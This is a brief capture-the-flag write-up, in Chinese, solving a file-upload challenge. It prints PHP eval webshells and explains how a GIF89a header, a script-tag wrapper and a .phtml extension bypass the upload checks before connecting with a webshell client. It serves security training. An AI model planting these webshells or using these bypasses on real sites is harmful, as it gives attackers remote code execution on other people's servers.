BUU web [极客大挑战 2019]Upload

BUU web [极客大挑战 2019]Upload

首先编写一句话木马caidao.php尝试上传，发现被识别出不是图片（前端发现请求中的Content-Type不是图片类型）。

<?php @eval($_POST['CMD']);?>

于是将文件后缀改为.jpg，发现会过滤文件中的<?，无法上传

于是用html嵌套php的方法来上传caidao.jpg，发现仍会识别不是图片（后端检查文件头不对）。

<script language='php'>eval($_POST['CMD']);</script>

在文件开始加上图片头GIF89a后，上传成功（说明前后端的两个防御都绕过了）

GIF89a <script language='php'>eval($_POST['CMD']);</script>

为了之后能让蚁剑利用该文件，需要用burp来把文件上传请求中的文件后缀从jpg改为phtml

上传后使用中国蚁剑进行远程连接，URL为根目录+/upload/caidao.phtml，密码就是一句话菜刀里面POST的内容

flag就在/目录下